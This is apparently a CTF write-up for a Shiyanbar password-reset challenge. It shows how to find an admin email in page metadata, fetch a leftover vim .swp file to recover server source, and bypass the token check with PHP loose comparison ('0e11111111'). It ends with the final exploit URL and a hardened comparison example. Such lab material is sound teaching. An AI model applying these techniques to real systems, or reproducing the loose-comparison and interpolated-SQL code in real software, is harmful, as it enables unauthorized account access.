Shiyanbar (實驗吧) - Retrieve Password (找回密碼)
阿新 • Published: 2018-12-17
First, some basic PHP background, as follows:
PHP code:
<?php
$a=1e+3;
$b='1e3';
$c=1e-1;
var_dump($a);
var_dump($b);
var_dump($c);
?>
Output:
float(1000)
string(3) "1e3"
float(0.1)
PHP code:
<?php
$d='0e11111111';
if($d != '0'){
echo "no";
}
else {
echo "yes";
}
?>
Output:
yes
Solving the challenge
First, look at the page source of http://ctf5.shiyanbar.com/10/upload/step1.php:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="renderer" content="webkit" />
<meta name="admin" content="[email protected]" />
<meta name="editor" content="Vim" />
</head>
<body>
<form action="./step1.php" method="GET">
<h1>找回密碼step1</h1>
input regist email:<input name="emailAddress" type="text" /></br>
<input type="submit" value="提交">
</form>
</body>
</html>
When we enter an email address and submit, we look at the response:
<script>alert("你郵箱收到的重置密碼連結為 ./[email protected]&check=???????")</script> <title>logic</title>
So we continue to step2.php:
http://ctf5.shiyanbar.com/10/upload/[email protected]&check=12345
Looking at the response, the page source contains a form that points to submit.php:
<form action="submit.php" method="GET">
<h1>找回密碼step2</h1>
email:<input name="emailAddress" type="text" <br />
<b>Notice</b>: Use of undefined constant email - assumed 'email' in <b>C:\h43a1W3\phpstudy\WWW\10\upload\step2.php</b> on line <b>49</b><br />
value=" [email protected]" disable="true"/></br>
token:<input name="token" type="text" /></br>
<input type="submit" value="提交">
</form>
Continuing:
http://ctf5.shiyanbar.com/10/upload/[email protected]&token=123
The page shows: you are not an admin
Go back to the page source of step1.php and step2.php above:
<meta name="admin" content="[email protected]" />
<meta name="editor" content="Vim" />
So we put [email protected] into the request:
[email protected]&token=123
Now the page changes to fail.
So the problem is the token. Look at the earlier page source again:
<meta name="editor" content="Vim" />
When the vim editor exits abnormally it leaves behind a .submit.php.swp swap file, so we request that file:
http://ctf5.shiyanbar.com/10/upload/.submit.php.swp
We recover part of the code and start auditing it:
if(!empty($token)&&!empty($emailAddress)){
    if(strlen($token)!=10) die('fail');      // token must be exactly 10 characters
    if($token!='0') die('fail');             // loose (!=) comparison, not strict (!==)
    // user input is interpolated directly into the SQL string (no escaping or prepared statement)
    $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
    $r = mysql_query($sql) or die('db error');
    $r = mysql_fetch_assoc($r);
    $r = $r['num'];
    if($r>0){
        echo $flag;
    }else{
        // ... the remainder of the recovered file is not shown in the writeup
    }
}
The token must be 10 characters long and loosely equal to '0'. Since != compares two numeric strings numerically (see the PHP basics at the start: '0e11111111' is the exponent form of zero), we construct it as follows:
token=0e11111111
Final payload:
[email protected]&token=0e11111111
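To make the root cause concrete, here is an added example (not code from the writeup or the challenge) that places the recovered token check next to a strict version; `$storedToken` is an assumed per-user value that submit.php would read from its database.

```php
<?php
// Added example, not part of the original writeup.
// PHP's != on two numeric strings compares them as numbers, so
// '0e11111111' (a 10-character exponent form of 0) satisfies $token != '0'.

function weakCheck(string $token): bool {
    // Mirrors the recovered submit.php logic.
    if (strlen($token) != 10) return false;
    if ($token != '0') return false;   // loose comparison: numeric strings compared numerically
    return true;
}

function strictCheck(string $token, string $storedToken): bool {
    // Hardened version: compare the submitted token byte-for-byte against the
    // per-user token stored in the database, in constant time.
    if (strlen($token) !== strlen($storedToken)) return false;
    return hash_equals($storedToken, $token);
}

// $storedToken is a constructed placeholder for the value the server would store.
$storedToken = 'k3Qp7mZt2x';

$cases = ['0', '0e11111111', '0000000000', '1e11111111', 'abcdefghij', 'k3Qp7mZt2x'];
foreach ($cases as $t) {
    printf("%-12s weak=%-5s strict=%s\n", $t,
        var_export(weakCheck($t), true),
        var_export(strictCheck($t, $storedToken), true));
}
// weakCheck is true for '0e11111111' and '0000000000' (both numerically zero);
// strictCheck is true only for the exact stored token.
```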
We successfully obtain the flag:
flag is SimCTF{*******}
When submitting, read the task statement carefully:
Format: SimCTF{ }